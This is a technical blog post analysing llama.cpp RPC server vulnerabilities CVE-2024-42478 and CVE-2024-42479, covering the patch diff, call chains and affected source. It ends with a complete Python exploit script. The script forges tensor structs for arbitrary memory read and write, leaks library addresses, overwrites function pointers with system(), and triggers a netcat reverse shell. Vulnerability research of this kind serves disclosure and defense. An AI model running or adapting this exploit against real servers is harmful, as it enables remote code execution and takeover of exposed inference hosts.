[Original] llama.cpp < b3561: RCE Analysis of the GET_TENSOR / SET_TENSOR Combined Vulnerability

Posted 2025-9-15 15:47

Preface

In 2024, llama.cpp had two vulnerabilities, GHSA-5vm9-p64x-gqw9 and GHSA-wcr5-566p-9cwj (i.e. CVE-2024-42478 and CVE-2024-42479). They affect versions <= b3560 and were fixed in b3561.

According to the GitHub advisories, we can control the data pointer in the rpc_tensor struct to achieve arbitrary address read/write; the advisories also provide the call chains and a PoC.

Environment Setup

Build commands

cmake -B build -DGGML_RPC=ON -DCMAKE_CXX_FLAGS_RELEASE="-g"
cmake --build build -j 32
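With the RPC backend built, the server can then be started for local testing. A minimal invocation (the -H/-p flags as implemented in the b3560 rpc-server example; binding to 0.0.0.0 reproduces the dangerous pre-patch default that the diff below changes):

./build/bin/rpc-server -H 0.0.0.0 -p 50052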

Vulnerability Analysis

Diff Analysis

Given the version numbers, I diffed the b3560 and b3561 tags. The result:

diff --git a/examples/rpc/README.md b/examples/rpc/README.md
index e1da801f..adedc890 100644
--- a/examples/rpc/README.md
+++ b/examples/rpc/README.md
@@ -1,5 +1,9 @@
 ## Overview
 
+> [!IMPORTANT]
+> This example and the RPC backend are currently in a proof-of-concept development stage. As such, the functionality is fragile and
+> insecure. **Never run the RPC server on an open network or in a sensitive environment!**
+
 The `rpc-server` allows  running `ggml` backend on a remote host.
 The RPC backend communicates with one or several instances of `rpc-server` and offloads computations to them.
 This can be used for distributed LLM inference with `llama.cpp` in the following way:
diff --git a/examples/rpc/rpc-server.cpp b/examples/rpc/rpc-server.cpp
index 7c15d2aa..6342e648 100644
--- a/examples/rpc/rpc-server.cpp
+++ b/examples/rpc/rpc-server.cpp
@@ -16,7 +16,7 @@
 #include <stdio.h>
 
 struct rpc_server_params {
-    std::string host        = "0.0.0.0";
+    std::string host        = "127.0.0.1";
     int         port        = 50052;
     size_t      backend_mem = 0;
 };
@@ -114,6 +114,17 @@ int main(int argc, char * argv[]) {
         fprintf(stderr, "Invalid parameters\n");
         return 1;
     }
+
+    if (params.host != "127.0.0.1") {
+        fprintf(stderr, "\n");
+        fprintf(stderr, "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n");
+        fprintf(stderr, "WARNING: Host ('%s') is != '127.0.0.1'\n", params.host.c_str());
+        fprintf(stderr, "         Never expose the RPC server to an open network!\n");
+        fprintf(stderr, "         This is an experimental feature and is not secure!\n");
+        fprintf(stderr, "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n");
+        fprintf(stderr, "\n");
+    }
+
     ggml_backend_t backend = create_backend();
     if (!backend) {
         fprintf(stderr, "Failed to create backend\n");
diff --git a/ggml/src/ggml-rpc.cpp b/ggml/src/ggml-rpc.cpp
index b01ad267..7757615f 100644
--- a/ggml/src/ggml-rpc.cpp
+++ b/ggml/src/ggml-rpc.cpp
@@ -197,6 +197,10 @@ static std::shared_ptr<socket_t> create_server_socket(const char * host, int por
         fprintf(stderr, "Failed to set SO_REUSEADDR\n");
         return nullptr;
     }
+    if (inet_addr(host) == INADDR_NONE) {
+        fprintf(stderr, "Invalid host address: %s\n", host);
+        return nullptr;
+    }
     struct sockaddr_in serv_addr;
     serv_addr.sin_family = AF_INET;
     serv_addr.sin_addr.s_addr = inet_addr(host);
@@ -879,6 +883,14 @@ ggml_tensor * rpc_server::deserialize_tensor(struct ggml_context * ctx, const rp
     if (result->buffer && buffers.find(result->buffer) == buffers.end()) {
         return nullptr;
     }
+
+    // require that the tensor data does not go beyond the buffer end
+    uint64_t tensor_size = (uint64_t) ggml_nbytes(result);
+    uint64_t buffer_start = (uint64_t) ggml_backend_buffer_get_base(result->buffer);
+    uint64_t buffer_size = (uint64_t) ggml_backend_buffer_get_size(result->buffer);
+    GGML_ASSERT(tensor->data + tensor_size >= tensor->data); // check for overflow
+    GGML_ASSERT(tensor->data >= buffer_start && tensor->data + tensor_size <= buffer_start + buffer_size);
+
     result->op = (ggml_op) tensor->op;
     for (uint32_t i = 0; i < GGML_MAX_OP_PARAMS / sizeof(int32_t); i++) {
         result->op_params[i] = tensor->op_params[i];
@@ -898,7 +910,7 @@ bool rpc_server::set_tensor(const std::vector<uint8_t> & input) {
     const rpc_tensor * in_tensor = (const rpc_tensor *)input.data();
     uint64_t offset;
     memcpy(&offset, input.data() + sizeof(rpc_tensor), sizeof(offset));
-    size_t size = input.size() - sizeof(rpc_tensor) - sizeof(offset);
+    const size_t size = input.size() - sizeof(rpc_tensor) - sizeof(offset);
 
     struct ggml_init_params params {
         /*.mem_size   =*/ ggml_tensor_overhead(),
@@ -913,6 +925,17 @@ bool rpc_server::set_tensor(const std::vector<uint8_t> & input) {
         return false;
     }
     GGML_PRINT_DEBUG("[%s] buffer: %p, data: %p, offset: %" PRIu64 ", size: %zu\n", __func__, (void*)tensor->buffer, tensor->data, offset, size);
+
+    // sanitize tensor->data
+    {
+        const size_t p0 = (size_t) ggml_backend_buffer_get_base(tensor->buffer);
+        const size_t p1 = p0 + ggml_backend_buffer_get_size(tensor->buffer);
+
+        if (in_tensor->data + offset < p0 || in_tensor->data + offset >= p1 || size > (p1 - in_tensor->data - offset)) {
+            GGML_ABORT("[%s] tensor->data out of bounds\n", __func__);
+        }
+    }
+
     const void * data = input.data() + sizeof(rpc_tensor) + sizeof(offset);
     ggml_backend_tensor_set(tensor, data, offset, size);
     ggml_free(ctx);
@@ -943,6 +966,17 @@ bool rpc_server::get_tensor(const std::vector<uint8_t> & input, std::vector<uint
         return false;
     }
     GGML_PRINT_DEBUG("[%s] buffer: %p, data: %p, offset: %" PRIu64 ", size: %" PRIu64 "\n", __func__, (void*)tensor->buffer, tensor->data, offset, size);
+
+    // sanitize tensor->data
+    {
+        const size_t p0 = (size_t) ggml_backend_buffer_get_base(tensor->buffer);
+        const size_t p1 = p0 + ggml_backend_buffer_get_size(tensor->buffer);
+
+        if (in_tensor->data + offset < p0 || in_tensor->data + offset >= p1 || size > (p1 - in_tensor->data - offset)) {
+            GGML_ABORT("[%s] tensor->data out of bounds\n", __func__);
+        }
+    }
+
     // output serialization format: | data (size bytes) |
     output.resize(size, 0);
     ggml_backend_tensor_get(tensor, output.data(), offset, size);
diff --git a/ggml/src/ggml.c b/ggml/src/ggml.c
index c937b5e5..38990e3a 100644
--- a/ggml/src/ggml.c
+++ b/ggml/src/ggml.c
@@ -3724,7 +3724,8 @@ static struct ggml_tensor * ggml_new_tensor_impl(
         struct ggml_tensor  * view_src,
         size_t                view_offs) {
 
-    assert(n_dims >= 1 && n_dims <= GGML_MAX_DIMS);
+    GGML_ASSERT(type >= 0 && type < GGML_TYPE_COUNT);
+    GGML_ASSERT(n_dims >= 1 && n_dims <= GGML_MAX_DIMS);
 
     // find the base tensor and absolute offset
     if (view_src != NULL && view_src->view_src != NULL) {

rpc_server::deserialize_tensor, rpc_server::set_tensor, and rpc_server::get_tensor all gained bounds checks on tensor->data, offset, and size. Judging from the patch, before these checks were added, tensor->data + offset + size could point outside the buffer.
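To see why the patch needs the dedicated overflow assert, note that with 64-bit pointer arithmetic, data + size can wrap around below data and slip past a naive range check. A quick model in Python (pointers treated as 64-bit unsigned integers; the addresses are invented for illustration):

MASK = (1 << 64) - 1                  # model 64-bit unsigned pointer arithmetic

buffer_start, buffer_size = 0x7f0000000000, 0x1000
data = 0x7f0000000800                 # points inside the buffer
size = (1 << 64) - 0x800              # chosen so that data + size wraps around

end = (data + size) & MASK            # wraps back to exactly buffer_start
# a naive range check is satisfied despite the wildly out-of-bounds access:
assert buffer_start <= data and end <= buffer_start + buffer_size
# GGML_ASSERT(tensor->data + tensor_size >= tensor->data) rejects precisely this:
assert end < data                     # the wraparound the patch detects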

Call Chain Analysis

The advisory authors give the call chains for both vulnerabilities directly.

Arbitrary address read call chain:

  • start_rpc_server
    • rpc_serve_client
      • rpc_server::get_tensor
        • ggml_backend_tensor_get
          • ggml_backend_cpu_buffer_get_tensor

Arbitrary address write call chain:

  • start_rpc_server
    • rpc_serve_client
      • rpc_server::set_tensor
        • ggml_backend_tensor_set
          • ggml_backend_cpu_buffer_set_tensor

The two call chains are nearly identical, so let's look at the arbitrary read first.

Arbitrary Address Read Vulnerability

start_rpc_server

start_rpc_server is the entry point of the RPC service. After initializing the listening socket, it enters a loop:

  1. socket_accept() blocks waiting for a client connection
  2. rpc_serve_client() handles that single client's RPC requests

rpc_serve_client

rpc_serve_client creates an rpc_server instance for each client connection, then reads a 1-byte cmd, an 8-byte input_size, and input_size bytes of payload into input. Each request on the wire is therefore laid out as:

field   cmd   input_size   input.data()
bytes   1     8            input_size
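A minimal client-side sketch of this framing in Python (plain sockets; the command numbering comes from the rpc_cmd enum, reproduced in the exploit script at the end, which does the same thing with pwntools):

import socket
import struct

def send_cmd(sock: socket.socket, cmd: int, payload: bytes) -> None:
    # | cmd (1 byte) | input_size (8 bytes, little-endian) | payload |
    sock.sendall(struct.pack("<BQ", cmd, len(payload)) + payload)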

Reading further down, we hit a switch over the commands: add, edit, show, and delete are all there (any CTF player's DNA will stir).


rpc_server::get_tensor

bool rpc_server::get_tensor(const std::vector<uint8_t> & input, std::vector<uint8_t> & output) {
    // serialization format: | rpc_tensor | offset (8 bytes) | size (8 bytes) |
    if (input.size() != sizeof(rpc_tensor) + 2*sizeof(uint64_t)) {
        return false;
    }
    const rpc_tensor * in_tensor = (const rpc_tensor *)input.data();
    uint64_t offset;
    memcpy(&offset, input.data() + sizeof(rpc_tensor), sizeof(offset));
    uint64_t size;
    memcpy(&size, input.data() + sizeof(rpc_tensor) + sizeof(offset), sizeof(size));
 
    struct ggml_init_params params {
        /*.mem_size   =*/ ggml_tensor_overhead(),
        /*.mem_buffer =*/ NULL,
        /*.no_alloc   =*/ true,
    };
    struct ggml_context * ctx = ggml_init(params);
    ggml_tensor * tensor = deserialize_tensor(ctx, in_tensor);
    if (tensor == nullptr) {
        GGML_PRINT_DEBUG("[%s] error deserializing tensor\n", __func__);
        ggml_free(ctx);
        return false;
    }
    GGML_PRINT_DEBUG("[%s] buffer: %p, data: %p, offset: %" PRIu64 ", size: %" PRIu64 "\n", __func__, (void*)tensor->buffer, tensor->data, offset, size);
    // output serialization format: | data (size bytes) |
    output.resize(size, 0);
    ggml_backend_tensor_get(tensor, output.data(), offset, size);
    ggml_free(ctx);
    return true;
}

get_tensor first validates the input size, then parses out an rpc_tensor struct, an offset (8 bytes), and a size (8 bytes). In other words, we fully control the contents of the tensor struct.
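Concretely, a GET_TENSOR request body is one packed rpc_tensor followed by two u64 values. A sketch building on the send_cmd helper above (get_tensor_raw is my name, not the project's; the reply framing, an 8-byte length prefix before the data, is inferred from the exploit script below):

GET_TENSOR = 7

def get_tensor_raw(sock, rpc_tensor: bytes, offset: int, size: int) -> bytes:
    # request: | rpc_tensor | offset (8 bytes) | size (8 bytes) |
    send_cmd(sock, GET_TENSOR, rpc_tensor + struct.pack("<QQ", offset, size))
    out_size = struct.unpack("<Q", sock.recv(8))[0]  # reply: | size (8) | data |
    return sock.recv(out_size)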

It then creates a temporary ctx and deserializes the incoming tensor. deserialize_tensor copies some of the wire tensor's fields into result. Note that it checks whether result->buffer is in the buffers set and returns nullptr if it is not, so the buffer field must be a handle the server previously handed out.

ggml_tensor * rpc_server::deserialize_tensor(struct ggml_context * ctx, const rpc_tensor * tensor) {
    ggml_tensor * result = ggml_new_tensor_4d(ctx, (ggml_type) tensor->type,
        tensor->ne[0], tensor->ne[1], tensor->ne[2], tensor->ne[3]);
    for (uint32_t i = 0; i < GGML_MAX_DIMS; i++) {
        result->nb[i] = tensor->nb[i];
    }
    result->buffer = reinterpret_cast<ggml_backend_buffer_t>(tensor->buffer);
    if (result->buffer && buffers.find(result->buffer) == buffers.end()) {
        return nullptr;
    }
    result->op = (ggml_op) tensor->op;
    for (uint32_t i = 0; i < GGML_MAX_OP_PARAMS / sizeof(int32_t); i++) {
        result->op_params[i] = tensor->op_params[i];
    }
    result->flags = tensor->flags;
    result->data = reinterpret_cast<void *>(tensor->data);
    ggml_set_name(result, tensor->name);
    return result;
}

So where do the elements of buffers come from? rpc_server::alloc_buffer allocates a buffer of the requested size and inserts it into the buffers set.

bool rpc_server::alloc_buffer(const std::vector<uint8_t> & input, std::vector<uint8_t> & output) {
    // input serialization format: | size (8 bytes) |
    if (input.size() != sizeof(uint64_t)) {
        return false;
    }
    uint64_t size;
    memcpy(&size, input.data(), sizeof(size));
    ggml_backend_buffer_type_t buft = ggml_backend_get_default_buffer_type(backend);
    ggml_backend_buffer_t buffer = ggml_backend_buft_alloc_buffer(buft, size);
    uint64_t remote_ptr = 0;
    uint64_t remote_size = 0;
    if (buffer != nullptr) {
        remote_ptr = reinterpret_cast<uint64_t>(buffer);
        remote_size = buffer->size;
        GGML_PRINT_DEBUG("[%s] size: %" PRIu64 " -> remote_ptr: %" PRIx64 ", remote_size: %" PRIu64 "\n", __func__, size, remote_ptr, remote_size);
        buffers.insert(buffer);
    } else {
        GGML_PRINT_DEBUG("[%s] size: %" PRIu64 " -> failed\n", __func__, size);
    }
    // output serialization format: | remote_ptr (8 bytes) | remote_size (8 bytes) |
    output.resize(2*sizeof(uint64_t), 0);
    memcpy(output.data(), &remote_ptr, sizeof(remote_ptr));
    memcpy(output.data() + sizeof(uint64_t), &remote_size, sizeof(remote_size));
    return true;
}
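Note that the reply leaks remote_ptr, the raw heap address of the ggml_backend_buffer object itself; the server hands out a heap infoleak by design. A client-side sketch using the framing helper from earlier (alloc_buffer_raw is my name for it):

ALLOC_BUFFER = 0

def alloc_buffer_raw(sock, size: int):
    # request: | size (8 bytes) | -> reply: | out_size (8) | remote_ptr (8) | remote_size (8) |
    send_cmd(sock, ALLOC_BUFFER, struct.pack("<Q", size))
    reply = sock.recv(8 + 16)
    return struct.unpack_from("<QQ", reply, 8)  # (remote_ptr, remote_size)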

ggml_backend_tensor_get

GGML_CALL void ggml_backend_tensor_get(const struct ggml_tensor * tensor, void * data, size_t offset, size_t size) {
    ggml_backend_buffer_t buf = tensor->view_src ? tensor->view_src->buffer : tensor->buffer;
 
    GGML_ASSERT(buf != NULL && "tensor buffer not set");
    GGML_ASSERT(tensor->data != NULL && "tensor not allocated");
    GGML_ASSERT(offset + size <= ggml_nbytes(tensor) && "tensor read out of bounds");
 
    if (!size) {
        return;
    }
 
    buf->iface.get_tensor(buf, tensor, data, offset, size);
}
 
GGML_CALL static void ggml_backend_cpu_buffer_get_tensor(ggml_backend_buffer_t buffer, const struct ggml_tensor * tensor, void * data, size_t offset, size_t size) {
    memcpy(data, (const char *)tensor->data + offset, size);
 
    GGML_UNUSED(buffer);
}

The only check is offset + size <= ggml_nbytes(tensor), after which buf->iface.get_tensor is called to copy the data. Whether the data and buffer fields are legitimate is never considered. So as long as we supply a buffer field that passes the lookup, pointing data anywhere gives us arbitrary address read/write.
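Since ne and nb come straight off the wire, ggml_nbytes(tensor) is attacker-controlled as well. A rough Python model of the block-size-1 branch of ggml_nbytes (simplified from ggml.c; nbytes_model is my name) shows why the exploit's ne = 0xdeadbeef, nb = 1 makes this bound effectively unlimited:

def nbytes_model(type_size: int, ne: list, nb: list) -> int:
    # simplified ggml_nbytes for types whose block size is 1 (see ggml.c)
    n = type_size
    for i in range(4):
        n += (ne[i] - 1) * nb[i]
    return n

# ~0x37ab6fbbc: far larger than any real buffer, so offset + size always passes
print(hex(nbytes_model(4, [0xdeadbeef] * 4, [1] * 4)))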

The advisory already tells us that buf->iface.get_tensor here is ggml_backend_cpu_buffer_get_tensor. So how is iface assigned? Going back to rpc_server::alloc_buffer, it calls ggml_backend_get_default_buffer_type to fetch the default buft, then ggml_backend_buft_alloc_buffer to allocate the buffer.

ggml_backend_buffer_type_t buft = ggml_backend_get_default_buffer_type(backend);
ggml_backend_buffer_t buffer = ggml_backend_buft_alloc_buffer(buft, size);

ggml_backend_get_default_buffer_type returns a static ggml_backend_buffer_type struct:

GGML_CALL ggml_backend_buffer_type_t ggml_backend_cpu_buffer_type(void) {
    static struct ggml_backend_buffer_type ggml_backend_cpu_buffer_type = {
        /* .iface = */ {
            /* .get_name         = */ ggml_backend_cpu_buffer_type_get_name,
            /* .alloc_buffer     = */ ggml_backend_cpu_buffer_type_alloc_buffer,
            /* .get_alignment    = */ ggml_backend_cpu_buffer_type_get_alignment,
            /* .get_max_size     = */ NULL, // defaults to SIZE_MAX
            /* .get_alloc_size   = */ NULL, // defaults to ggml_nbytes
            /* .is_host          = */ ggml_backend_cpu_buffer_type_is_host,
        },
        /* .context = */ NULL,
    };
 
    return &ggml_backend_cpu_buffer_type;
}

So ggml_backend_buft_alloc_buffer ends up calling ggml_backend_cpu_buffer_type_alloc_buffer:

GGML_CALL ggml_backend_buffer_t ggml_backend_buft_alloc_buffer(ggml_backend_buffer_type_t buft, size_t size) {
    return buft->iface.alloc_buffer(buft, size);
}
 
GGML_CALL static ggml_backend_buffer_t ggml_backend_cpu_buffer_type_alloc_buffer(ggml_backend_buffer_type_t buft, size_t size) {
    size += TENSOR_ALIGNMENT;   // malloc may return an address that is not aligned
    void * data = malloc(size); // TODO: use GGML_ALIGNED_MALLOC (move to ggml-impl.h)
    if (data == NULL) {
        fprintf(stderr, "%s: failed to allocate buffer of size %zu\n", __func__, size);
        return NULL;
    }
 
    return ggml_backend_buffer_init(buft, cpu_backend_buffer_i, data, size);
}

After malloc'ing heap memory into the data pointer, it is wrapped into a ggml_backend_buffer via ggml_backend_buffer_init and returned:

(*buffer) = (struct ggml_backend_buffer) {
    /* .interface = */ iface,
    /* .buft      = */ buft,
    /* .context   = */ context,
    /* .size      = */ size,
    /* .usage     = */ GGML_BACKEND_BUFFER_USAGE_ANY
};

The final buffer struct looks like this:

pwndbg> p *buffer
$1 = {
  iface = {
    get_name = 0x7f012b105570 <ggml_backend_cpu_buffer_name>,
    free_buffer = 0x7f012b1055d0 <ggml_backend_cpu_buffer_free_buffer>,
    get_base = 0x7f012b105580 <ggml_backend_cpu_buffer_get_base>,
    init_tensor = 0x0,
    set_tensor = 0x7f012b105660 <ggml_backend_cpu_buffer_set_tensor>,
    get_tensor = 0x7f012b105680 <ggml_backend_cpu_buffer_get_tensor>,
    cpy_tensor = 0x7f012b105fd0 <ggml_backend_cpu_buffer_cpy_tensor>,
    clear = 0x7f012b105640 <ggml_backend_cpu_buffer_clear>,
    reset = 0x0
  },
  buft = 0x7f012b199ba0 <ggml_backend_cpu_buffer_type>,
  context = 0x555a0cfc0430,
  size = 288,
  usage = GGML_BACKEND_BUFFER_USAGE_ANY
}
 
pwndbg> p *buffer.buft
$2 = {
  iface = {
    get_name = 0x7f012b105bf0 <ggml_backend_cpu_buffer_type_get_name>,
    alloc_buffer = 0x7f012b105d30 <ggml_backend_cpu_buffer_type_alloc_buffer>,
    get_alignment = 0x7f012b1055a0 <ggml_backend_cpu_buffer_type_get_alignment>,
    get_max_size = 0x0,
    get_alloc_size = 0x0,
    is_host = 0x7f012b1055b0 <ggml_backend_cpu_buffer_type_is_host>
  },
  context = 0x0
}

Arbitrary Address Write Vulnerability

This path goes through rpc_server::set_tensor; the root cause is essentially the same as the arbitrary read, so I won't repeat it.

Exploitation

From the analysis above, rewriting data gives us arbitrary read/write, and alloc_buffer even hands back the buffer's address for free, so the first step is to read heap memory. After scanning through the heap contents, the only thing I found to leak is an address inside ggml.


Then, using a GOT entry of ggml.so that has already been resolved to a real address, we can leak a libc address, overwrite a buffer object's embedded iface function pointers on the heap, and finally trigger system via BUFFER_CLEAR.


#!/usr/bin/env python3
# nc -lvnp 9001
from pwn import *
 
binary = ELF("./build/bin/rpc-server")
libc = ELF("/usr/lib/x86_64-linux-gnu/libc-2.31.so", checksec=False)
ggml_so = ELF("/share/llama.cpp/llama-b3560/build/ggml/src/libggml.so", checksec=False)
context.binary = binary
 
 
ALLOC_BUFFER = 0
GET_ALIGNMENT = 1
GET_MAX_SIZE = 2
BUFFER_GET_BASE = 3
FREE_BUFFER = 4
BUFFER_CLEAR = 5
SET_TENSOR = 6
GET_TENSOR = 7
COPY_TENSOR = 8
GRAPH_COMPUTE = 9
GET_DEVICE_MEMORY = 10
 
 
def send_cmd(io: remote, cmd: int, buf: bytes):
    packet = p8(cmd)         # cmd, 1 byte
    packet += p64(len(buf))  # msg size, 8 bytes
    packet += buf            # content, size of the buffer you want to allocate
    io.send(packet)
 
 
def alloc_buffer(io: remote, size: int):
    send_cmd(io, ALLOC_BUFFER, p64(size))
    recv = io.recvn(0x8 + 0x10)  # reply: | out_size (8) | remote_ptr (8) | remote_size (8) |
    ptr = u64(recv[0x8:0x10])
    sz = u64(recv[0x10:0x18])
    log.info(f"remote_ptr: {hex(ptr)}, remote_size: {sz}")
    return ptr, sz
 
 
def free_buffer(io: remote, remote_ptr):
    send_cmd(io, FREE_BUFFER, p64(remote_ptr))
 
 
def clear_buffer(io: remote, remote_ptr, value=0x00):
    send_cmd(io, BUFFER_CLEAR, p64(remote_ptr) + p8(value))
 
 
def arb_read(io: remote, valid_buffer_addr: int, target_addr: int, leak_size: int):
    rpc_tensor_pd = flat([
        0x1,  # id
        p32(2),  # type
        p64(valid_buffer_addr),  # buffer
        [p32(0xdeadbeef), p32(0xdeadbeef), p32(0xdeadbeef), p32(0xdeadbeef),],  # ne
        [p32(1), p32(1), p32(1), p32(1),],  # nb
        p32(0),  # op
        [p32(0)] * 16,  # op_params (corrected from 8 to 16)
        p32(0),  # flags
        [p64(0)] * 10,  # src
        p64(0),  # view_src
        p64(0),  # view_offs
        p64(target_addr),  # data
        'a' * 64,  # name
        'x' * 4,  # padding
    ])
    content = rpc_tensor_pd
    content += p64(0)  # offset
    content += p64(leak_size)  # size
    send_cmd(io, GET_TENSOR, content)
    size = u64(io.recvn(0x8))
    return io.recvn(size)
 
 
def arb_write(io: remote, valid_buffer_addr: int, target_addr: int, data: bytes):
    rpc_tensor_pd = flat([
        0x1,  # id
        p32(2),  # type
        p64(valid_buffer_addr),  # buffer
        [p32(0xdeadbeef), p32(0xdeadbeef), p32(0xdeadbeef), p32(0xdeadbeef),],  # ne
        [p32(1), p32(1), p32(1), p32(1),],  # nb
        p32(0),  # op
        [p32(0)] * 16,  # op_params (corrected from 8 to 16)
        p32(0),  # flags
        [p64(0)] * 10,  # src
        p64(0),  # view_src
        p64(0),  # view_offs
        p64(target_addr),  # data
        'a' * 64,  # name
        'x' * 4,  # padding
    ])
    content = rpc_tensor_pd
    content += p64(0)  # offset
    content += data
    send_cmd(io, SET_TENSOR, content)
 
 
p = remote("127.0.0.1", 50052)
remote_ptr, _ = alloc_buffer(p, 0x100)
buffer_ptr = remote_ptr + (0xf0 - 0x60)
leak_addr = remote_ptr + 0x80
log.info(f"buffer_ptr: {hex(buffer_ptr)}")
p.close()
 
p = remote("127.0.0.1", 50052)
remote_ptr, remote_size = alloc_buffer(p, 0x100)
# leak ggml base
recv = arb_read(p, buffer_ptr, leak_addr, 0x100)
leak_ggml_addr = u64(recv[0x10:0x18])
ggml_base = leak_ggml_addr - ggml_so.symbols["ggml_backend_cpu_buffer_name"]
ggml_puts_got = ggml_base + ggml_so.got["puts"]
log.info(f"leak_ggml_addr: {hex(leak_ggml_addr)}, ggml_puts_got: {hex(ggml_puts_got)}")
# leak libc base
recv = arb_read(p, buffer_ptr, ggml_puts_got, 0x100)
libc_puts_addr = u64(recv[:0x8])
libc_base = libc_puts_addr - libc.symbols["puts"]
log.info(f"libc_base: {hex(libc_base)}")
# hijack
cmd = flat([
    b"nc -c sh 127.0.0.1 9001".ljust(0x37, b" ") + b"\x00",
    libc_base + libc.symbols["system"]
])
arb_write(p, buffer_ptr, buffer_ptr, cmd)
clear_buffer(p, remote_ptr)
 
# ipdb.set_trace()
p.interactive()
p.close()
